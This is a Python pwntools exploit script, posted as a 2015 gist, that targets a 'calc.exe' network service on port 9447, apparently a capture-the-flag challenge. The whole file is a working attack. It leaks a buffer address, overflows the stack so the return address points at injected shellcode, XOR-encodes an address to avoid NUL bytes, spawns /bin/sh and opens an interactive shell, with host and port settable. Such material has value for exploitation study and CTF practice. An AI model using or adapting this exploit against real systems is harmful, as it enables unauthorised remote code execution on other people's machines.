@cubarco
Created December 4, 2015 07:56
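#!/usr/bin/env python
# coding=utf8
"""Exploit script for a ``calc.exe`` network service (default target localhost:9447).

What the script does, as written below:

1. reads the ``Welcome to calc.exe`` banner and sends ``get_buf_addr``; the
   service replies with a line whose last whitespace-separated token is a
   hex address, which is taken as the address of the input buffer;
2. builds a payload that overruns that buffer so a saved pointer in the
   frame points at its own slot and the adjacent return address points at
   shellcode placed further along in the same buffer;
3. sends the payload, then one more line of calculator input, and drops
   into an interactive session (a shell if the shellcode ran).

Usage: ``python exploit.py [HOST [PORT]]``.  With no arguments the original
hard-coded target (localhost, 9447) is used.

NOTE: written against Python 2 pwntools, where ``p32()``/``asm()`` return
``str`` and concatenate directly with the ``'A'`` padding; under Python 3
the padding would have to be ``bytes``.
"""
from pwn import p32, remote, context, asm, shellcraft
import sys

context.arch = 'i386'

# Target is optionally taken from the command line; the defaults preserve the
# original hard-coded behaviour.
host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = int(sys.argv[2]) if len(sys.argv) > 2 else 9447

p = remote(host, port)
p.recvuntil('Welcome to calc.exe\n')

# Leak the buffer address.  Fail with the raw reply instead of an opaque
# ValueError/IndexError if the service answers with something unexpected.
p.sendline('get_buf_addr')
leak_line = p.recvline()
try:
    buf_addr = int(leak_line.split()[-1], 16)
except (IndexError, ValueError):
    print('unexpected reply to get_buf_addr: %r' % leak_line)
    sys.exit(1)

# Payload layout, as offsets from the leaked buffer address:
#   +0x84 (= 0x98 - 16 - 4)  p32(shellcode_addr)  value consumed by the final `ret`
#   +0x88                    p32(ecx_set)         pointer whose value is its own address
#   +0x8c                    0x20 bytes of filler
#   +0xac                    shellcode
# ecx_set pointing at itself is consistent with an epilogue that restores
# esp from a saved register (e.g. `lea esp, [ecx-4]; ret`), which would make
# the `ret` pop shellcode_addr -- presumed from the offsets, confirm against
# the target binary.
pad_len = 0x98 - 16 - 4
ecx_set = buf_addr + pad_len + 4
shellcode_addr = buf_addr + pad_len + 4 * 2 + 0x20

# Shellcode: push "/bin/sh", then call the routine at 0x10011a (labelled
# `spawn` in the original comment) as spawn(edi, edi, 1) with a junk return
# address.  0x0010011a contains a NUL byte, so the address is carried
# XOR-encoded with 0x12121212 and decoded in ebx; this keeps the payload free
# of the bytes that the check before sendline() rejects.
spawn_addr = 0x10011a
xor_key = 0x12121212
shellcode_str = (
'''
{}
mov edi, esp
{}
push edi
push edi
push 0xdeadbeef /* junk */
mov ebx, {}
xor ebx, {:#x}
call ebx
'''.format(shellcraft.i386.pushstr('/bin/sh'),
shellcraft.i386.push(1),
spawn_addr ^ xor_key,
xor_key) # spawn(%x, %x, %d)
)
print(shellcode_str)
shellcode = asm(shellcode_str)

payload = 'A' * pad_len + \
    p32(shellcode_addr) + \
    p32(ecx_set) + \
    'A' * 0x20 + \
    shellcode

# The payload goes out via sendline(), so an embedded '\n' would end the line
# early, and a NUL would truncate it if the service treats input as a C
# string.  Abort rather than send something that cannot arrive intact.
if '\n' in payload or '\x00' in payload:
    print('newline or zero byte found in payload')
    sys.exit(1)

p.sendline(payload)
# Second line of input the service expects after the oversized one; the
# specific operands are carried over from the original exploit and are
# presumably what drives the vulnerable path -- not explained here, confirm.
p.sendline("201527 0")
p.interactive()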